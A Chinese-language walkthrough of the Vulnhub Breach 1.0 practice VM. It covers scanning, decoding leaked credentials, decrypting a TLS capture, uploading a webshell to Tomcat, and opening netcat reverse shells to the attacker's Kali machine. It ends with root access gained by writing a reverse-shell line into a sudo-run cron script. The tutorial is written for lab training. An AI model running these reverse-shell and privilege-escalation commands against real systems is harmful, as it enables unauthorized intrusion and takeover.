【渗透测试】Vulnhub 1.0通关手册

2021年11月20日00:06:25评论921 views字数 2088阅读6分57秒阅读模式

【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

0x00 环境配置

该靶机使用了静态IP地址（192.168.110.140），我们需要配置虚拟机的网络。打开VMware，点击最上面一栏“编辑”→“虚拟网络编辑器”

【渗透测试】Vulnhub 1.0通关手册

添加一条网络，选择nat模式，子网地址192.168.110.0，子网掩码255.255.255.0，打开虚拟机的网络设置，选择自定义模式，使用刚刚配置好的nat模式的网卡。攻击机Kali也使用同样的方法配置。

【渗透测试】Vulnhub 1.0通关手册

0x01信息搜集

首先扫描靶机的IP地址

1.可以使用arp-scan

arp-scan -l

【渗透测试】Vulnhub 1.0通关手册

2.可以用nmap扫描C段

nmap 192.168.110.0/24

【渗透测试】Vulnhub 1.0通关手册

3.可以使用fping扫描C段

fping -g 192.168.110/24

【渗透测试】Vulnhub 1.0通关手册

扫描服务器的端口

nmap 192.168.110.140

【渗透测试】Vulnhub 1.0通关手册

发现开启了很多很多端口，做了端口混淆。我们可以使用隐蔽扫描

nmap 192.168.110.140 -sF

【渗透测试】Vulnhub 1.0通关手册

扫描服务器指纹信息

nmap 192.168.110.140 -O  whatweb 192.168.110.140

【渗透测试】Vulnhub 1.0通关手册

0x02 漏洞挖掘

访问web页面，查看源代码。发现了一处注释，是两次base64编码后的结果。

【渗透测试】Vulnhub 1.0通关手册

也可以使用命令解码

echo "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo" | base64 -d | base64 -d

【渗透测试】Vulnhub 1.0通关手册

查看源码发现一个页面，点进去进入到一个邮箱登录页面。用刚刚两次base64解码的账号密码登录。

【渗透测试】Vulnhub 1.0通关手册

在邮件中发现了包含ssl证书的秘钥文件

【渗透测试】Vulnhub 1.0通关手册

发现了红队攻击的流量包文件

【渗透测试】Vulnhub 1.0通关手册

发现了解密ssl证书的字符串

【渗透测试】Vulnhub 1.0通关手册

从秘钥库导出.p12证书

keytool -list -keystore keystore

导出名为admin.p12的文件

keytool -importkeystore -srckeystore keystore -destkeystore admin.p12 -deststoretype pkcs12

【渗透测试】Vulnhub 1.0通关手册

打开wireshark进行解密

【渗透测试】Vulnhub 1.0通关手册

选择tls（旧版wireshark也叫ssl），填写靶机地址，解密证书路径，协议，端口，解密字符串

【渗透测试】Vulnhub 1.0通关手册

打开流量报文

【渗透测试】Vulnhub 1.0通关手册

即可看到解密后的流量包文，过滤出http请求，选择追踪http流

【渗透测试】Vulnhub 1.0通关手册

发现攻击者登录的路径及账号密码

【渗透测试】Vulnhub 1.0通关手册

进行base64解密

【渗透测试】Vulnhub 1.0通关手册

登陆Tomcat后台，注意：直接登陆登不进，不知道为什么，要用burpsuite进行一次代理

【渗透测试】Vulnhub 1.0通关手册

成功登陆，发现任意文件上传漏洞

【渗透测试】Vulnhub 1.0通关手册

0x03 操作系统提权

上传webshell,可以直接上传大马，然后再进行NC反弹（因为靶机有查杀webshell的工具，每隔一段时间就会清空webshell）。我这里没找到合适的大马，就用了冰蝎（加密传输，所以靶机没有杀掉webshell，为了演示，我们依旧进行nc反弹）。冰蝎依旧进行了本地代理，不然连接不上

【渗透测试】Vulnhub 1.0通关手册

反弹到kali

Kali端监听nc反弹到端口，我们用4444端口

nc -l -p 4444

冰蝎端执行反弹命令

nc -nv 192.168.110.128 -c /bin/bash

KALI接收到反弹，我们用Python写一个交互式的shell

python -c 'import pty:;pty.spawn("/bin/bash")'

【渗透测试】Vulnhub 1.0通关手册

在网站的目录下存在着连接数据库的账号密码，数据库里包含了登录靶机的口令

【渗透测试】Vulnhub 1.0通关手册

数据库是空密码，进入数据库

mysql -u root -p  show databases;  use mysql;  show tables;  select * from users;

【渗透测试】Vulnhub 1.0通关手册

把密码进行MD5解密得到“thelaststraw”，直接登陆靶机

【渗透测试】Vulnhub 1.0通关手册

用history命令看到用户提权到blumbergh用户的记录。该用户密码保存在images目录下的图片里，可以用strings命令查看,在bill.png发现了隐藏的密码

【渗透测试】Vulnhub 1.0通关手册

登录

【渗透测试】Vulnhub 1.0通关手册

发现支持以sudo权限运行的脚本

【渗透测试】Vulnhub 1.0通关手册

利用该脚本进行提权，创建一个反弹命令的TXT文件

echo"nc 192.168.110.128 4444 -e /bin/bash" >>shell.txt

kali端先开启监听

nc -l -p 4444

将该文本写入到支持sudo执行的脚本中去，从而使用root用户执行反弹命令

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

由于该脚本2分钟执行一次，所以kali端执行命令不能第一时间接收到反馈，等等就好。生成交互式shell，拿下主机root权限

【渗透测试】Vulnhub 1.0通关手册

备注：

靶场下载地址发在我们的官方知识星球：暗魂攻防实验室（稍后会在知识星球发布百度网盘下载地址）

官方下载地址：

https://download.vulnhub.com/breach/Breach-1.0.zip

【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

●【漏洞复现】蓝凌0A后台密码读解密（附POC）

●【渗透测试】hackthebox靶场之TheNotebook

●【渗透测试】hackthebox靶场之Ophiuchi

●【漏洞复现】Weblogic CVE-2020-2551漏洞复现

【渗透测试】Vulnhub 1.0通关手册

【渗透测试】Vulnhub 1.0通关手册

微信搜一搜

【渗透测试】Vulnhub 1.0通关手册

暗魂攻防实验室

本文始发于微信公众号（暗魂攻防实验室）：【渗透测试】Vulnhub 1.0通关手册

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2021年11月20日00:06:25
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
【渗透测试】Vulnhub 1.0通关手册https://cn-sec.com/archives/421928.html

目录

8888